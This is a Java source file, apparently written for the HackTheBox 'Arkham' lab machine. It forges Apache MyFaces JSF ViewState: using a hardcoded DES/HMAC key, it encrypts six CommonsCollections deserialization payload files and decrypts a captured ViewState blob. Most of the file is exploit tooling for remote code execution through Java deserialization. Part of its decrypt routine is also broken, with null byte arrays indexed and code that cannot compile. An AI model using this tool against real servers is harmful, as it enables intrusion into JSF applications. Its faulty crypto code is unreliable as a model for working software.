· 6 years ago · May 27, 2019, 01:10 AM
1/*
2 * To change this license header, choose License Headers in Project Properties.
3 * To change this template file, choose Tools | Templates
4 * and open the template in the editor.
5 */
6package myfaces_stateutils;
7
8import static com.oracle.jrockit.jfr.ContentType.Bytes;
9import java.io.ByteArrayInputStream;
10import java.io.ByteArrayOutputStream;
11import java.io.IOException;
12import java.io.ObjectInputStream;
13import java.io.ObjectOutputStream;
14import java.io.UnsupportedEncodingException;
15import java.security.AccessController;
16import java.security.NoSuchAlgorithmException;
17import java.security.PrivilegedActionException;
18import java.security.PrivilegedExceptionAction;
19import java.util.Base64;
20import java.util.Random;
21import java.util.logging.Level;
22import java.util.logging.Logger;
23import java.util.zip.GZIPInputStream;
24import java.util.zip.GZIPOutputStream;
25
26import javax.crypto.Cipher;
27import javax.crypto.KeyGenerator;
28import javax.crypto.Mac;
29import javax.crypto.SecretKey;
30import javax.crypto.spec.IvParameterSpec;
31import javax.crypto.spec.SecretKeySpec;
32
33import java.io.File;
34import java.nio.file.Files;
35import java.nio.file.Paths;
36
37import java.security.MessageDigest;
38import java.security.NoSuchAlgorithmException;
39import java.util.Formatter;
40
41public class Myfaces_StateUtils {
42
43 public static final String ZIP_CHARSET = "ISO-8859-1";
44
45 public static final String DEFAULT_ALGORITHM = "DES";
46
47 public static final String DEFAULT_ALGORITHM_PARAMS = "ECB/PKCS5Padding";
48
49 public static final String INIT_PREFIX = "org.apache.myfaces.";
50
51 public static final String USE_ENCRYPTION = INIT_PREFIX + "USE_ENCRYPTION";
52
53 public static final String INIT_SECRET = INIT_PREFIX + "SECRET";
54
55 public static final String INIT_ALGORITHM = INIT_PREFIX + "ALGORITHM";
56
57 public static final String INIT_SECRET_KEY_CACHE = INIT_SECRET + ".CACHE";
58
59 public static final String INIT_ALGORITHM_IV = INIT_ALGORITHM + ".IV";
60
61 public static final String INIT_ALGORITHM_PARAM = INIT_ALGORITHM + ".PARAMETERS";
62
63 public static final String SERIAL_FACTORY = INIT_PREFIX + "SERIAL_FACTORY";
64
65 public static final String COMPRESS_STATE_IN_CLIENT = INIT_PREFIX + "COMPRESS_STATE_IN_CLIENT";
66
67 public static final String DEFAULT_MAC_ALGORITHM = "HmacSHA1";
68
69 public static final String INIT_MAC_ALGORITHM = "org.apache.myfaces.MAC_ALGORITHM";
70
71 public static final String INIT_MAC_SECRET = "org.apache.myfaces.MAC_SECRET";
72
73 public static final byte[] decode(byte[] bytes) {
74 return Base64.getDecoder().decode(bytes);
75 }
76
77 private static SecretKey getSecret() {
78 Object secretKey;
79
80 String algorithm = "DES";
81
82 secretKey = new SecretKeySpec(findSecret("SnNGOTg3Ni0="), algorithm);
83
84 return (SecretKey) secretKey;
85 }
86
87 private static byte[] findSecret(String secret) {
88 byte[] bytes = null;
89
90 bytes = decode(secret.getBytes());
91
92 return bytes;
93 }
94
95 private static byte[] findMacSecret(String secret) {
96 byte[] bytes = null;
97
98 bytes = decode(secret.getBytes());
99
100 return bytes;
101 }
102
103 private static SecretKey getMacSecret() {
104 Object secretKey;
105
106 String macAlgorithm = "HmacSHA1";
107
108 secretKey = new SecretKeySpec(findMacSecret("SnNGOTg3Ni0="), macAlgorithm);
109
110 return (SecretKey) secretKey;
111 }
112
113 private static String bytesToHex(byte[] hashInBytes) {
114
115 StringBuilder sb = new StringBuilder();
116 for (byte b : hashInBytes) {
117 sb.append(String.format("%02x", b));
118 }
119 return sb.toString();
120
121 }
122
123 byte[] byte_concat(byte[]...arrays)
124{
125 // Determine the length of the result array
126 int totalLength = 0;
127 for (int i = 0; i < arrays.length; i++)
128 {
129 totalLength += arrays[i].length;
130 }
131
132 // create the result array
133 byte[] result = new byte[totalLength];
134
135 // copy the source arrays into the result array
136 int currentIndex = 0;
137 for (int i = 0; i < arrays.length; i++)
138 {
139 System.arraycopy(arrays[i], 0, result, currentIndex, arrays[i].length);
140 currentIndex += arrays[i].length;
141 }
142
143 return result;
144}
145
146 public static byte[] decrypt(byte[] secure) {
147 String algorithm = "DES";
148
149 SecretKey secretKey = (SecretKey) getSecret();
150
151 String algorithmParams = "ECB/PKCS5Padding";
152 byte[] iv;
153
154 String macAlgorithm = "HmacSHA1";
155
156 SecretKey macSecretKey = (SecretKey) getMacSecret();
157
158 try {
159 // keep local to avoid threading issue
160 Mac mac = Mac.getInstance(macAlgorithm);
161 mac.init(macSecretKey);
162 Cipher cipher = Cipher.getInstance(algorithm + '/'
163 + algorithmParams);
164
165 cipher.init(Cipher.DECRYPT_MODE, secretKey);
166
167 //EtM Composition Approach
168 int macLenght = mac.getMacLength();
169 mac.update(secure, 0, secure.length - macLenght);
170 byte[] signedDigestHash = mac.doFinal();
171
172 //System.out.println(bytesToHex(signedDigestHash));
173 boolean isMacEqual = true;
174 for (int i = 0; i < signedDigestHash.length; i++) {
175 if (signedDigestHash[i] != secure[secure.length - macLenght + i]) {
176 isMacEqual = false;
177 }
178 }
179
180 byte[] secure_hash = null;
181 for (int i = 0; i < signedDigestHash.length; i++) {
182
183 byte secure_byte = null;
184 secure_byte[0] = secure[secure.length - macLenght + i];
185 System.arraycopy(secure_byte, 0, secure_hash, secure_hash.length, secure_byte.length);
186 }
187
188 System.out.println("-------------------");
189 System.out.println(bytesToHex(secure_hash));
190 System.out.println("-------------------");
191 System.out.println(bytesToHex(signedDigestHash));
192 System.out.println("-------------------");
193 if (!isMacEqual) {
194 System.out.print("MAC NOT EQUAL");
195 }
196
197 return cipher.doFinal(secure, 0, secure.length - macLenght);
198 } catch (Exception e) {
199 System.out.print("Faces Exception");
200 }
201
202 return null;
203 }
204
205 public static byte[] encrypt(byte[] insecure) {
206 String algorithm = "DES";
207
208 SecretKey secretKey = (SecretKey) getSecret();
209
210 String algorithmParams = "ECB/PKCS5Padding";
211 byte[] iv;
212
213 String macAlgorithm = "HmacSHA1";
214
215 SecretKey macSecretKey = (SecretKey) getMacSecret();
216
217 try {
218 // keep local to avoid threading issue
219 Mac mac = Mac.getInstance(macAlgorithm);
220 mac.init(macSecretKey);
221 Cipher cipher = Cipher.getInstance(algorithm + '/' + algorithmParams);
222
223 cipher.init(Cipher.ENCRYPT_MODE, secretKey);
224
225 //EtM Composition Approach
226 int macLenght = mac.getMacLength();
227 byte[] secure = new byte[cipher.getOutputSize(insecure.length) + macLenght];
228 int secureCount = cipher.doFinal(insecure, 0, insecure.length, secure);
229 mac.update(secure, 0, secureCount);
230 mac.doFinal(secure, secureCount);
231
232 return secure;
233 } catch (Exception e) {
234 System.out.print("Faces Exception");
235 }
236 return null;
237 }
238
239 public static final byte[] encode(byte[] bytes) {
240 return Base64.getEncoder().encode(bytes);
241 }
242
243 public static String SHA1sum(byte[] convertme) throws NoSuchAlgorithmException {
244 MessageDigest md = MessageDigest.getInstance("SHA-1");
245 return byteArray2Hex(md.digest(convertme));
246 }
247
248 private static String byteArray2Hex(final byte[] hash) {
249 Formatter formatter = new Formatter();
250 for (byte b : hash) {
251 formatter.format("%02x", b);
252 }
253 return formatter.toString();
254 }
255
256 private static void java_server_faces_encrypt(String payload_path) {
257
258 try {
259 byte[] payload_bytes = Files.readAllBytes(Paths.get(payload_path));
260 byte[] encrypted_payload_bytes = encrypt(payload_bytes);
261
262 byte[] base64_payload_bytes = encode(encrypted_payload_bytes);
263
264 String base64_payload_string = new String(base64_payload_bytes);
265
266 System.out.println(base64_payload_string);
267 System.out.println("\n----------------------------\n");
268
269 } catch (Exception e) {
270
271 System.out.println("Read File Error.");
272
273 }
274 }
275
276 private static void java_server_faces_decrypt(String base64_viewstate) {
277
278 byte[] ciphertext_base64_viewstate = decode(base64_viewstate.getBytes());
279
280 byte[] decrypted_base64_viewstate = decrypt(ciphertext_base64_viewstate);
281
282 String string_decrypted_base64_viewstate = new String(decrypted_base64_viewstate);
283
284 System.out.println(string_decrypted_base64_viewstate);
285 }
286
287 public static void main(String[] argv) {
288
289 String path1 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections1_intruder.txt";
290 String path2 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections2_intruder.txt";
291 String path3 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections3_intruder.txt";
292 String path4 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections4_intruder.txt";
293 String path5 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections5_intruder.txt";
294 String path6 = "D:\\Desktop\\Games\\ECGS\\Extra\\Online Puzzles\\HackTheBox\\Machines\\In_Progress\\Arkham\\Payloads\\Windows_CommonsCollections6_intruder.txt";
295
296 java_server_faces_encrypt(path1);
297
298 java_server_faces_encrypt(path2);
299
300 java_server_faces_encrypt(path3);
301
302 java_server_faces_encrypt(path4);
303
304 java_server_faces_encrypt(path5);
305
306 java_server_faces_encrypt(path6);
307
308 System.out.println();
309
310 java_server_faces_decrypt("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");
311 }
312
313}